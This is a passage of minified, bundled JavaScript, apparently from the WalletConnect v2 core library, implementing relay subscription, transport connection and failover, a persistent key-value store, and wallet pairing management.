            direction: "outgoing",
            request: s
        }), this.relayer.request(s);
    }
    onSubscribe(e, t) {
        this.setSubscription(e, $e9e439c110f17033$var$pe($e9e439c110f17033$var$K({}, t), {
            id: e
        })), this.pending.delete(t.topic);
    }
    onBatchSubscribe(e) {
        e.length && e.forEach((t)=>{
            this.setSubscription(t.id, $e9e439c110f17033$var$K({}, t)), this.pending.delete(t.topic);
        });
    }
    async onUnsubscribe(e, t, i) {
        this.events.removeAllListeners(t), this.hasSubscription(t, e) && this.deleteSubscription(t, i), await this.relayer.messages.del(e);
    }
    async setRelayerSubscriptions(e) {
        await this.relayer.core.storage.setItem(this.storageKey, e);
    }
    async getRelayerSubscriptions() {
        return await this.relayer.core.storage.getItem(this.storageKey);
    }
    setSubscription(e, t) {
        this.subscriptions.has(e) || (this.logger.debug("Setting subscription"), this.logger.trace({
            type: "method",
            method: "setSubscription",
            id: e,
            subscription: t
        }), this.addSubscription(e, t));
    }
    addSubscription(e, t) {
        this.subscriptions.set(e, $e9e439c110f17033$var$K({}, t)), this.topicMap.set(t.topic, e), this.events.emit($e9e439c110f17033$export$24ff3e54e94ef413.created, t);
    }
    getSubscription(e) {
        this.logger.debug("Getting subscription"), this.logger.trace({
            type: "method",
            method: "getSubscription",
            id: e
        });
        const t = this.subscriptions.get(e);
        if (!t) {
            const { message: i } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("NO_MATCHING_KEY", `${this.name}: ${e}`);
            throw new Error(i);
        }
        return t;
    }
    deleteSubscription(e, t) {
        this.logger.debug("Deleting subscription"), this.logger.trace({
            type: "method",
            method: "deleteSubscription",
            id: e,
            reason: t
        });
        const i = this.getSubscription(e);
        this.subscriptions.delete(e), this.topicMap.delete(i.topic, e), this.events.emit($e9e439c110f17033$export$24ff3e54e94ef413.deleted, $e9e439c110f17033$var$pe($e9e439c110f17033$var$K({}, i), {
            reason: t
        }));
    }
    async persist() {
        await this.setRelayerSubscriptions(this.values), this.events.emit($e9e439c110f17033$export$24ff3e54e94ef413.sync);
    }
    async reset() {
        if (this.cached.length) {
            const e = Math.ceil(this.cached.length / this.batchSubscribeTopicsLimit);
            for(let t = 0; t < e; t++){
                const i = this.cached.splice(0, this.batchSubscribeTopicsLimit);
                await this.batchSubscribe(i);
            }
        }
        this.events.emit($e9e439c110f17033$export$24ff3e54e94ef413.resubscribed);
    }
    async restore() {
        try {
            const e = await this.getRelayerSubscriptions();
            if (typeof e > "u" || !e.length) return;
            if (this.subscriptions.size) {
                const { message: t } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("RESTORE_WILL_OVERRIDE", this.name);
                throw this.logger.error(t), this.logger.error(`${this.name}: ${JSON.stringify(this.values)}`), new Error(t);
            }
            this.cached = e, this.logger.debug(`Successfully Restored subscriptions for ${this.name}`), this.logger.trace({
                type: "method",
                method: "restore",
                subscriptions: this.values
            });
        } catch (e) {
            this.logger.debug(`Failed to Restore subscriptions for ${this.name}`), this.logger.error(e);
        }
    }
    async batchSubscribe(e) {
        if (!e.length) return;
        const t = await this.rpcBatchSubscribe(e);
        (0, $a5d33cfc7f8e5437$export$41dd3d480aac4a71)(t) && this.onBatchSubscribe(t.map((i, s)=>$e9e439c110f17033$var$pe($e9e439c110f17033$var$K({}, e[s]), {
                id: i
            })));
    }
    async onConnect() {
        this.restartInProgress || (await this.restart(), this.onEnable());
    }
    onDisconnect() {
        this.onDisable();
    }
    async checkPending() {
        if (this.relayer.transportExplicitlyClosed) return;
        const e = [];
        this.pending.forEach((t)=>{
            e.push(t);
        }), await this.batchSubscribe(e);
    }
    registerEventListeners() {
        this.relayer.core.heartbeat.on((0, $212993b948b3fe4b$exports.HEARTBEAT_EVENTS).pulse, async ()=>{
            await this.checkPending();
        }), this.relayer.on($e9e439c110f17033$export$d56245796e2837d.connect, async ()=>{
            await this.onConnect();
        }), this.relayer.on($e9e439c110f17033$export$d56245796e2837d.disconnect, ()=>{
            this.onDisconnect();
        }), this.events.on($e9e439c110f17033$export$24ff3e54e94ef413.created, async (e)=>{
            const t = $e9e439c110f17033$export$24ff3e54e94ef413.created;
            this.logger.info(`Emitting ${t}`), this.logger.debug({
                type: "event",
                event: t,
                data: e
            }), await this.persist();
        }), this.events.on($e9e439c110f17033$export$24ff3e54e94ef413.deleted, async (e)=>{
            const t = $e9e439c110f17033$export$24ff3e54e94ef413.deleted;
            this.logger.info(`Emitting ${t}`), this.logger.debug({
                type: "event",
                event: t,
                data: e
            }), await this.persist();
        });
    }
    isInitialized() {
        if (!this.initialized) {
            const { message: e } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("NOT_INITIALIZED", this.name);
            throw new Error(e);
        }
    }
    async restartToComplete() {
        this.restartInProgress && await new Promise((e)=>{
            const t = setInterval(()=>{
                this.restartInProgress || (clearInterval(t), e());
            }, this.pollingInterval);
        });
    }
}
var $e9e439c110f17033$var$mr = Object.defineProperty, $e9e439c110f17033$var$St = Object.getOwnPropertySymbols, $e9e439c110f17033$var$Er = Object.prototype.hasOwnProperty, $e9e439c110f17033$var$fr = Object.prototype.propertyIsEnumerable, $e9e439c110f17033$var$Pt = (r, e, t)=>e in r ? $e9e439c110f17033$var$mr(r, e, {
        enumerable: !0,
        configurable: !0,
        writable: !0,
        value: t
    }) : r[e] = t, $e9e439c110f17033$var$wr = (r, e)=>{
    for(var t in e || (e = {}))$e9e439c110f17033$var$Er.call(e, t) && $e9e439c110f17033$var$Pt(r, t, e[t]);
    if ($e9e439c110f17033$var$St) for (var t of $e9e439c110f17033$var$St(e))$e9e439c110f17033$var$fr.call(e, t) && $e9e439c110f17033$var$Pt(r, t, e[t]);
    return r;
};
class $e9e439c110f17033$export$70e73aa29a3d4407 extends (0, $bace94c1ef08d1bc$export$9a0f755fd4f79434) {
    constructor(e){
        super(e), this.protocol = "wc", this.version = 2, this.events = new (0, $7etJZ.EventEmitter), this.name = $e9e439c110f17033$export$602d6e27611c3fcb, this.transportExplicitlyClosed = !1, this.initialized = !1, this.reconnecting = !1, this.connectionStatusPollingInterval = 20, this.staleConnectionErrors = [
            "socket hang up",
            "socket stalled"
        ], this.request = async (t)=>{
            this.logger.debug("Publishing Request Payload");
            try {
                return await this.toEstablishConnection(), await this.provider.request(t);
            } catch (i) {
                throw this.logger.debug("Failed to Publish Request"), this.logger.error(i), i;
            }
        }, this.core = e.core, this.logger = typeof e.logger < "u" && typeof e.logger != "string" ? (0, $7fc0ce2591a9daef$exports.generateChildLogger)(e.logger, this.name) : (0, $7fc0ce2591a9daef$exports.pino)((0, $7fc0ce2591a9daef$exports.getDefaultLoggerOptions)({
            level: e.logger || $e9e439c110f17033$export$5176ffa6778d6637
        })), this.messages = new $e9e439c110f17033$export$4a2542d0790ac2fd(this.logger, e.core), this.subscriber = new $e9e439c110f17033$export$60959659b2c22881(this, this.logger), this.publisher = new $e9e439c110f17033$var$lr(this, this.logger), this.relayUrl = e?.relayUrl || $e9e439c110f17033$export$a68061e6c48f332a, this.projectId = e.projectId, this.provider = {};
    }
    async init() {
        this.logger.trace("Initialized"), await this.createProvider(), await Promise.all([
            this.messages.init(),
            this.subscriber.init()
        ]);
        try {
            await this.transportOpen();
        } catch  {
            this.logger.warn(`Connection via ${this.relayUrl} failed, attempting to connect via failover domain ${$e9e439c110f17033$export$27fee22bec112637}...`), await this.restartTransport($e9e439c110f17033$export$27fee22bec112637);
        }
        this.registerEventListeners(), this.initialized = !0, setTimeout(async ()=>{
            this.subscriber.topics.length === 0 && (this.logger.info("No topics subscribed to after init, closing transport"), await this.transportClose(), this.transportExplicitlyClosed = !1);
        }, $e9e439c110f17033$export$fb3eab7adf12329d);
    }
    get context() {
        return (0, $7fc0ce2591a9daef$exports.getLoggerContext)(this.logger);
    }
    get connected() {
        return this.provider.connection.connected;
    }
    get connecting() {
        return this.provider.connection.connecting;
    }
    async publish(e, t, i) {
        this.isInitialized(), await this.publisher.publish(e, t, i), await this.recordMessageEvent({
            topic: e,
            message: t,
            publishedAt: Date.now()
        });
    }
    async subscribe(e, t) {
        var i;
        this.isInitialized();
        let s = ((i = this.subscriber.topicMap.get(e)) == null ? void 0 : i[0]) || "";
        return s || (await Promise.all([
            new Promise((n)=>{
                this.subscriber.once($e9e439c110f17033$export$24ff3e54e94ef413.created, (a)=>{
                    a.topic === e && n();
                });
            }),
            new Promise(async (n)=>{
                s = await this.subscriber.subscribe(e, t), n();
            })
        ]), s);
    }
    async unsubscribe(e, t) {
        this.isInitialized(), await this.subscriber.unsubscribe(e, t);
    }
    on(e, t) {
        this.events.on(e, t);
    }
    once(e, t) {
        this.events.once(e, t);
    }
    off(e, t) {
        this.events.off(e, t);
    }
    removeListener(e, t) {
        this.events.removeListener(e, t);
    }
    async transportClose() {
        this.transportExplicitlyClosed = !0, this.connected && (await this.provider.disconnect(), this.events.emit($e9e439c110f17033$export$d56245796e2837d.transport_closed));
    }
    async transportOpen(e) {
        if (this.transportExplicitlyClosed = !1, !this.reconnecting) {
            this.relayUrl = e || this.relayUrl, this.reconnecting = !0;
            try {
                await Promise.all([
                    new Promise((t)=>{
                        this.initialized || t(), this.subscriber.once($e9e439c110f17033$export$24ff3e54e94ef413.resubscribed, ()=>{
                            t();
                        });
                    }),
                    await Promise.race([
                        new Promise(async (t, i)=>{
                            await (0, $a5d33cfc7f8e5437$export$3da2293b007ed708)(this.provider.connect(), 1e4, `Socket stalled when trying to connect to ${this.relayUrl}`).catch((s)=>i(s)).then(()=>t()).finally(()=>this.removeListener($e9e439c110f17033$export$d56245796e2837d.transport_closed, this.rejectTransportOpen));
                        }),
                        new Promise((t)=>this.once($e9e439c110f17033$export$d56245796e2837d.transport_closed, this.rejectTransportOpen))
                    ])
                ]);
            } catch (t) {
                this.logger.error(t);
                const i = t;
                if (!this.isConnectionStalled(i.message)) throw t;
                this.events.emit($e9e439c110f17033$export$d56245796e2837d.transport_closed);
            } finally{
                this.reconnecting = !1;
            }
        }
    }
    async restartTransport(e) {
        this.transportExplicitlyClosed || this.reconnecting || (this.relayUrl = e || this.relayUrl, this.connected && await Promise.all([
            new Promise((t)=>{
                this.provider.once($e9e439c110f17033$export$58062acf2f31ddf8.disconnect, ()=>{
                    t();
                });
            }),
            this.transportClose()
        ]), await this.createProvider(), await this.transportOpen());
    }
    isConnectionStalled(e) {
        return this.staleConnectionErrors.some((t)=>e.includes(t));
    }
    rejectTransportOpen() {
        throw new Error("Attempt to connect to relay via `transportOpen` has stalled. Retrying...");
    }
    async createProvider() {
        const e = await this.core.crypto.signJWT(this.relayUrl);
        this.provider = new (0, $1582203255a670cd$export$da28308012bf6748)(new (0, $5d413cc341fdd8f8$export$2e2bcd8739ae039)((0, $a5d33cfc7f8e5437$export$d875b3963ef774f5)({
            sdkVersion: $e9e439c110f17033$export$5f30917a6f8c9025,
            protocol: this.protocol,
            version: this.version,
            relayUrl: this.relayUrl,
            projectId: this.projectId,
            auth: e,
            useOnCloseEvent: !0
        }))), this.registerProviderListeners();
    }
    async recordMessageEvent(e) {
        const { topic: t, message: i } = e;
        await this.messages.set(t, i);
    }
    async shouldIgnoreMessageEvent(e) {
        const { topic: t, message: i } = e;
        if (!i || i.length === 0) return this.logger.debug(`Ignoring invalid/empty message: ${i}`), !0;
        if (!await this.subscriber.isSubscribed(t)) return this.logger.debug(`Ignoring message for non-subscribed topic ${t}`), !0;
        const s = this.messages.has(t, i);
        return s && this.logger.debug(`Ignoring duplicate message: ${i}`), s;
    }
    async onProviderPayload(e) {
        if (this.logger.debug("Incoming Relay Payload"), this.logger.trace({
            type: "payload",
            direction: "incoming",
            payload: e
        }), (0, $2e45abd1d679ec32$export$f6e4034abe07d2a5)(e)) {
            if (!e.method.endsWith($e9e439c110f17033$export$119b4645f6b233c8)) return;
            const t = e.params, { topic: i, message: s, publishedAt: n } = t.data, a = {
                topic: i,
                message: s,
                publishedAt: n
            };
            this.logger.debug("Emitting Relayer Payload"), this.logger.trace($e9e439c110f17033$var$wr({
                type: "event",
                event: t.id
            }, a)), this.events.emit(t.id, a), await this.acknowledgePayload(e), await this.onMessageEvent(a);
        } else (0, $2e45abd1d679ec32$export$308ba927de2bcbe8)(e) && this.events.emit($e9e439c110f17033$export$d56245796e2837d.message_ack, e);
    }
    async onMessageEvent(e) {
        await this.shouldIgnoreMessageEvent(e) || (this.events.emit($e9e439c110f17033$export$d56245796e2837d.message, e), await this.recordMessageEvent(e));
    }
    async acknowledgePayload(e) {
        const t = (0, $3bb3ddc7bbc938cc$export$478fdea01c2a3198)(e.id, !0);
        await this.provider.connection.send(t);
    }
    registerProviderListeners() {
        this.provider.on($e9e439c110f17033$export$58062acf2f31ddf8.payload, (e)=>this.onProviderPayload(e)), this.provider.on($e9e439c110f17033$export$58062acf2f31ddf8.connect, ()=>{
            this.events.emit($e9e439c110f17033$export$d56245796e2837d.connect);
        }), this.provider.on($e9e439c110f17033$export$58062acf2f31ddf8.disconnect, ()=>{
            this.onProviderDisconnect();
        }), this.provider.on($e9e439c110f17033$export$58062acf2f31ddf8.error, (e)=>{
            this.logger.error(e), this.events.emit($e9e439c110f17033$export$d56245796e2837d.error, e);
        });
    }
    registerEventListeners() {
        this.events.on($e9e439c110f17033$export$d56245796e2837d.connection_stalled, async ()=>{
            await this.restartTransport();
        });
    }
    onProviderDisconnect() {
        this.events.emit($e9e439c110f17033$export$d56245796e2837d.disconnect), this.attemptToReconnect();
    }
    attemptToReconnect() {
        this.transportExplicitlyClosed || setTimeout(async ()=>{
            await this.restartTransport();
        }, (0, $aG48A.toMiliseconds)($e9e439c110f17033$export$11ccd39be2c57d6));
    }
    isInitialized() {
        if (!this.initialized) {
            const { message: e } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("NOT_INITIALIZED", this.name);
            throw new Error(e);
        }
    }
    async toEstablishConnection() {
        if (!this.connected) {
            if (this.connecting) return await new Promise((e)=>{
                const t = setInterval(()=>{
                    this.connected && (clearInterval(t), e());
                }, this.connectionStatusPollingInterval);
            });
            await this.restartTransport();
        }
    }
}
var $e9e439c110f17033$var$vr = Object.defineProperty, $e9e439c110f17033$var$xt = Object.getOwnPropertySymbols, $e9e439c110f17033$var$Ir = Object.prototype.hasOwnProperty, $e9e439c110f17033$var$Cr = Object.prototype.propertyIsEnumerable, $e9e439c110f17033$var$At = (r, e, t)=>e in r ? $e9e439c110f17033$var$vr(r, e, {
        enumerable: !0,
        configurable: !0,
        writable: !0,
        value: t
    }) : r[e] = t, $e9e439c110f17033$var$zt = (r, e)=>{
    for(var t in e || (e = {}))$e9e439c110f17033$var$Ir.call(e, t) && $e9e439c110f17033$var$At(r, t, e[t]);
    if ($e9e439c110f17033$var$xt) for (var t of $e9e439c110f17033$var$xt(e))$e9e439c110f17033$var$Cr.call(e, t) && $e9e439c110f17033$var$At(r, t, e[t]);
    return r;
};
class $e9e439c110f17033$export$390f32400eaf98c9 extends (0, $bace94c1ef08d1bc$export$a7f17ba6c54777e7) {
    constructor(e, t, i, s = $e9e439c110f17033$export$f258d29ae5e3d545, n){
        super(e, t, i, s), this.core = e, this.logger = t, this.name = i, this.map = new Map, this.version = $e9e439c110f17033$export$629a342182ba24b, this.cached = [], this.initialized = !1, this.storagePrefix = $e9e439c110f17033$export$f258d29ae5e3d545, this.init = async ()=>{
            this.initialized || (this.logger.trace("Initialized"), await this.restore(), this.cached.forEach((a)=>{
                this.getKey && a !== null && !(0, $a5d33cfc7f8e5437$export$fce6876652108ab)(a) ? this.map.set(this.getKey(a), a) : (0, $a5d33cfc7f8e5437$export$f657f7976bb2769d)(a) ? this.map.set(a.id, a) : (0, $a5d33cfc7f8e5437$export$c96d5113768aaf5e)(a) && this.map.set(a.topic, a);
            }), this.cached = [], this.initialized = !0);
        }, this.set = async (a, o)=>{
            this.isInitialized(), this.map.has(a) ? await this.update(a, o) : (this.logger.debug("Setting value"), this.logger.trace({
                type: "method",
                method: "set",
                key: a,
                value: o
            }), this.map.set(a, o), await this.persist());
        }, this.get = (a)=>(this.isInitialized(), this.logger.debug("Getting value"), this.logger.trace({
                type: "method",
                method: "get",
                key: a
            }), this.getData(a)), this.getAll = (a)=>(this.isInitialized(), a ? this.values.filter((o)=>Object.keys(a).every((h)=>(0, (/*@__PURE__*/$parcel$interopDefault($6cqMT)))(o[h], a[h]))) : this.values), this.update = async (a, o)=>{
            this.isInitialized(), this.logger.debug("Updating value"), this.logger.trace({
                type: "method",
                method: "update",
                key: a,
                update: o
            });
            const h = $e9e439c110f17033$var$zt($e9e439c110f17033$var$zt({}, this.getData(a)), o);
            this.map.set(a, h), await this.persist();
        }, this.delete = async (a, o)=>{
            this.isInitialized(), this.map.has(a) && (this.logger.debug("Deleting value"), this.logger.trace({
                type: "method",
                method: "delete",
                key: a,
                reason: o
            }), this.map.delete(a), await this.persist());
        }, this.logger = (0, $7fc0ce2591a9daef$exports.generateChildLogger)(t, this.name), this.storagePrefix = s, this.getKey = n;
    }
    get context() {
        return (0, $7fc0ce2591a9daef$exports.getLoggerContext)(this.logger);
    }
    get storageKey() {
        return this.storagePrefix + this.version + "//" + this.name;
    }
    get length() {
        return this.map.size;
    }
    get keys() {
        return Array.from(this.map.keys());
    }
    get values() {
        return Array.from(this.map.values());
    }
    async setDataStore(e) {
        await this.core.storage.setItem(this.storageKey, e);
    }
    async getDataStore() {
        return await this.core.storage.getItem(this.storageKey);
    }
    getData(e) {
        const t = this.map.get(e);
        if (!t) {
            const { message: i } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("NO_MATCHING_KEY", `${this.name}: ${e}`);
            throw this.logger.error(i), new Error(i);
        }
        return t;
    }
    async persist() {
        await this.setDataStore(this.values);
    }
    async restore() {
        try {
            const e = await this.getDataStore();
            if (typeof e > "u" || !e.length) return;
            if (this.map.size) {
                const { message: t } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("RESTORE_WILL_OVERRIDE", this.name);
                throw this.logger.error(t), new Error(t);
            }
            this.cached = e, this.logger.debug(`Successfully Restored value for ${this.name}`), this.logger.trace({
                type: "method",
                method: "restore",
                value: this.values
            });
        } catch (e) {
            this.logger.debug(`Failed to Restore value for ${this.name}`), this.logger.error(e);
        }
    }
    isInitialized() {
        if (!this.initialized) {
            const { message: e } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("NOT_INITIALIZED", this.name);
            throw new Error(e);
        }
    }
}
class $e9e439c110f17033$export$3370ee24730992a3 {
    constructor(e, t){
        this.core = e, this.logger = t, this.name = $e9e439c110f17033$export$390360ea476c6145, this.version = $e9e439c110f17033$export$5593ec74b27d1b18, this.events = new (0, (/*@__PURE__*/$parcel$interopDefault($7etJZ))), this.initialized = !1, this.storagePrefix = $e9e439c110f17033$export$f258d29ae5e3d545, this.ignoredPayloadTypes = [
            (0, $a5d33cfc7f8e5437$export$406e97c329f0f3d4)
        ], this.registeredMethods = [], this.init = async ()=>{
            this.initialized || (await this.pairings.init(), await this.cleanup(), this.registerRelayerEvents(), this.registerExpirerEvents(), this.initialized = !0, this.logger.trace("Initialized"));
        }, this.register = ({ methods: i })=>{
            this.isInitialized(), this.registeredMethods = [
                ...new Set([
                    ...this.registeredMethods,
                    ...i
                ])
            ];
        }, this.create = async ()=>{
            this.isInitialized();
            const i = (0, $a5d33cfc7f8e5437$export$d15a28e4f1821243)(), s = await this.core.crypto.setSymKey(i), n = (0, $a5d33cfc7f8e5437$export$b136d03015bfc12)((0, $aG48A.FIVE_MINUTES)), a = {
                protocol: $e9e439c110f17033$export$822d0bd1635d5360
            }, o = {
                topic: s,
                expiry: n,
                relay: a,
                active: !1
            }, h = (0, $a5d33cfc7f8e5437$export$b2786ede34fb2350)({
                protocol: this.core.protocol,
                version: this.core.version,
                topic: s,
                symKey: i,
                relay: a
            });
            return await this.pairings.set(s, o), await this.core.relayer.subscribe(s), this.core.expirer.set(s, n), {
                topic: s,
                uri: h
            };
        }, this.pair = async (i)=>{
            this.isInitialized(), this.isValidPair(i);
            const { topic: s, symKey: n, relay: a } = (0, $a5d33cfc7f8e5437$export$59f58847421cfb28)(i.uri);
            if (this.pairings.keys.includes(s)) throw new Error(`Pairing already exists: ${s}`);
            if (this.core.crypto.hasKeys(s)) throw new Error(`Keychain already exists: ${s}`);
            const o = (0, $a5d33cfc7f8e5437$export$b136d03015bfc12)((0, $aG48A.FIVE_MINUTES)), h = {
                topic: s,
                relay: a,
                expiry: o,
                active: !1
            };
            return await this.pairings.set(s, h), await this.core.crypto.setSymKey(n, s), await this.core.relayer.subscribe(s, {
                relay: a
            }), this.core.expirer.set(s, o), i.activatePairing && await this.activate({
                topic: s
            }), h;
        }, this.activate = async ({ topic: i })=>{
            this.isInitialized();
            const s = (0, $a5d33cfc7f8e5437$export$b136d03015bfc12)((0, $aG48A.THIRTY_DAYS));
            await this.pairings.update(i, {
                active: !0,
                expiry: s
            }), this.core.expirer.set(i, s);
        }, this.ping = async (i)=>{
            this.isInitialized(), await this.isValidPing(i);
            const { topic: s } = i;
            if (this.pairings.keys.includes(s)) {
                const n = await this.sendRequest(s, "wc_pairingPing", {}), { done: a, resolve: o, reject: h } = (0, $a5d33cfc7f8e5437$export$cbf9e3cc9ffc85cb)();
                this.events.once((0, $a5d33cfc7f8e5437$export$e3eb27ce66c0f6d9)("pairing_ping", n), ({ error: l })=>{
                    l ? h(l) : o();
                }), await a();
            }
        }, this.updateExpiry = async ({ topic: i, expiry: s })=>{
            this.isInitialized(), await this.pairings.update(i, {
                expiry: s
            });
        }, this.updateMetadata = async ({ topic: i, metadata: s })=>{
            this.isInitialized(), await this.pairings.update(i, {
                peerMetadata: s
            });
        }, this.getPairings = ()=>(this.isInitialized(), this.pairings.values), this.disconnect = async (i)=>{
            this.isInitialized(), await this.isValidDisconnect(i);
            const { topic: s } = i;
            this.pairings.keys.includes(s) && (await this.sendRequest(s, "wc_pairingDelete", (0, $a5d33cfc7f8e5437$export$8203ef1531c8b5b5)("USER_DISCONNECTED")), await this.deletePairing(s));
        }, this.sendRequest = async (i, s, n)=>{
            const a = (0, $3bb3ddc7bbc938cc$export$11d081ebb32d4398)(s, n), o = await this.core.crypto.encode(i, a), h = $e9e439c110f17033$export$d94d6986a8185883[s].req;
            return this.core.history.set(i, a), this.core.relayer.publish(i, o, h), a.id;
        }, this.sendResult = async (i, s, n)=>{
            const a = (0, $3bb3ddc7bbc938cc$export$478fdea01c2a3198)(i, n), o = await this.core.crypto.encode(s, a), h = await this.core.history.get(s, i), l = $e9e439c110f17033$export$d94d6986a8185883[h.request.method].res;
            await this.core.relayer.publish(s, o, l), await this.core.history.resolve(a);
        }, this.sendError = async (i, s, n)=>{
            const a = (0, $3bb3ddc7bbc938cc$export$9f7302ae26c3f77)(i, n), o = await this.core.crypto.encode(s, a), h = await this.core.history.get(s, i), l = $e9e439c110f17033$export$d94d6986a8185883[h.request.method] ? $e9e439c110f17033$export$d94d6986a8185883[h.request.method].res : $e9e439c110f17033$export$d94d6986a8185883.unregistered_method.res;
            await this.core.relayer.publish(s, o, l), await this.core.history.resolve(a);
        }, this.deletePairing = async (i, s)=>{
            await this.core.relayer.unsubscribe(i), await Promise.all([
                this.pairings.delete(i, (0, $a5d33cfc7f8e5437$export$8203ef1531c8b5b5)("USER_DISCONNECTED")),
                this.core.crypto.deleteSymKey(i),
                s ? Promise.resolve() : this.core.expirer.del(i)
            ]);
        }, this.cleanup = async ()=>{
            const i = this.pairings.getAll().filter((s)=>(0, $a5d33cfc7f8e5437$export$57947cfd429801a2)(s.expiry));
            await Promise.all(i.map((s)=>this.deletePairing(s.topic)));
        }, this.onRelayEventRequest = (i)=>{
            const { topic: s, payload: n } = i;
            switch(n.method){
                case "wc_pairingPing":
                    return this.onPairingPingRequest(s, n);
                case "wc_pairingDelete":
                    return this.onPairingDeleteRequest(s, n);
                default:
                    return this.onUnknownRpcMethodRequest(s, n);
            }
        }, this.onRelayEventResponse = async (i)=>{
            const { topic: s, payload: n } = i, a = (await this.core.history.get(s, n.id)).request.method;
            switch(a){
                case "wc_pairingPing":
                    return this.onPairingPingResponse(s, n);
                default:
                    return this.onUnknownRpcMethodResponse(a);
            }
        }, this.onPairingPingRequest = async (i, s)=>{
            const { id: n } = s;
            try {
                this.isValidPing({
                    topic: i
                }), await this.sendResult(n, i, !0), this.events.emit("pairing_ping", {
                    id: n,
                    topic: i
                });
            } catch (a) {
                await this.sendError(n, i, a), this.logger.error(a);
            }
        }, this.onPairingPingResponse = (i, s)=>{
            const { id: n } = s;
            setTimeout(()=>{
                (0, $2e45abd1d679ec32$export$cb3d3b20e3223d77)(s) ? this.events.emit((0, $a5d33cfc7f8e5437$export$e3eb27ce66c0f6d9)("pairing_ping", n), {}) : (0, $2e45abd1d679ec32$export$5662a1047b4d1d15)(s) && this.events.emit((0, $a5d33cfc7f8e5437$export$e3eb27ce66c0f6d9)("pairing_ping", n), {
                    error: s.error
                });
            }, 500);
        }, this.onPairingDeleteRequest = async (i, s)=>{
            const { id: n } = s;
            try {
                this.isValidDisconnect({
                    topic: i
                }), await this.deletePairing(i), this.events.emit("pairing_delete", {
                    id: n,
                    topic: i
                });
            } catch (a) {
                await this.sendError(n, i, a), this.logger.error(a);
            }
        }, this.onUnknownRpcMethodRequest = async (i, s)=>{
            const { id: n, method: a } = s;
            try {
                if (this.registeredMethods.includes(a)) return;
                const o = (0, $a5d33cfc7f8e5437$export$8203ef1531c8b5b5)("WC_METHOD_UNSUPPORTED", a);
                await this.sendError(n, i, o), this.logger.error(o);
            } catch (o) {
                await this.sendError(n, i, o), this.logger.error(o);
            }
        }, this.onUnknownRpcMethodResponse = (i)=>{
            this.registeredMethods.includes(i) || this.logger.error((0, $a5d33cfc7f8e5437$export$8203ef1531c8b5b5)("WC_METHOD_UNSUPPORTED", i));
        }, this.isValidPair = (i)=>{
            if (!(0, $a5d33cfc7f8e5437$export$b3f5fcca1d210454)(i)) {
                const { message: s } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `pair() params: ${i}`);
                throw new Error(s);
            }
            if (!(0, $a5d33cfc7f8e5437$export$bef94a5618bf18bf)(i.uri)) {
                const { message: s } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `pair() uri: ${i.uri}`);
                throw new Error(s);
            }
        }, this.isValidPing = async (i)=>{
            if (!(0, $a5d33cfc7f8e5437$export$b3f5fcca1d210454)(i)) {
                const { message: n } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `ping() params: ${i}`);
                throw new Error(n);
            }
            const { topic: s } = i;
            await this.isValidPairingTopic(s);
        }, this.isValidDisconnect = async (i)=>{
            if (!(0, $a5d33cfc7f8e5437$export$b3f5fcca1d210454)(i)) {
                const { message: n } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `disconnect() params: ${i}`);
                throw new Error(n);
            }
            const { topic: s } = i;
            await this.isValidPairingTopic(s);
        }, this.isValidPairingTopic = async (i)=>{
            if (!(0, $a5d33cfc7f8e5437$export$ee898ca48ab56c74)(i, !1)) {
                const { message: s } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `pairing topic should be a string: ${i}`);
                throw new Error(s);
            }
            if (!this.pairings.keys.includes(i)) {
                const { message: s } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("NO_MATCHING_KEY", `pairing topic doesn't exist: ${i}`);
                throw new Error(s);
            }
            if ((0, $a5d33cfc7f8e5437$export$57947cfd429801a2)(this.pairings.get(i).expiry)) {
                await this.deletePairing(i);
                const { message: s } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("EXPIRED", `pairing topic: ${i}`);
                throw new Error(s);
            }
        }, this.core = e, this.logger = (0, $7fc0ce2591a9daef$exports.generateChildLogger)(t, this.name), this.pairings = new $e9e439c110f17033$export$390f32400eaf98c9(this.core, this.logger, this.name, this.storagePrefix);
    }
    get context() {
        return (0, $7fc0ce2591a9daef$exports.getLoggerContext)(this.logger);
    }
    isInitialized() {
        if (!this.initialized) {
            const { message: e } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("NOT_INITIALIZED", this.name);
            throw new Error(e);
        }
    }
    registerRelayerEvents() {
        this.core.relayer.on($e9e439c110f17033$export$d56245796e2837d.message, async (e)=>{
            const { topic: t, message: i } = e;
            if (!this.pairings.keys.includes(t) || this.ignoredPayloadTypes.includes(this.core.crypto.getPayloadType(i))) return;
            const s = await this.core.crypto.decode(t, i);
            try {
                (0, $2e45abd1d679ec32$export$f6e4034abe07d2a5)(s) ? (this.core.history.set(t, s), this.onRelayEventRequest({
                    topic: t,
                    payload: s
                })) : (0, $2e45abd1d679ec32$export$308ba927de2bcbe8)(s) && (await this.core.history.resolve(s), await this.onRelayEventResponse({
                    topic: t,
                    payload: s
                }), this.core.history.delete(t, s.id));
            } catch (n) {
                this.logger.error(n);
            }
        });
    }
    registerExpirerEvents() {
        this.core.expirer.on($e9e439c110f17033$export$9013719d9206b0c1.expired, async (e)=>{
            const { topic: t } = (0, $a5d33cfc7f8e5437$export$93adeb0f16e8e51d)(e.target);
            t && this.pairings.keys.includes(t) && (await this.deletePairing(t, !0), this.events.emit("pairing_expire", {
                topic: t
            }));
        });
    }
}
class $e9e439c110f17033$export$eeb4f10f25d479cb extends (0, $bace94c1ef08d1bc$export$45b2c2643615b67) {
    constructor(e, t){
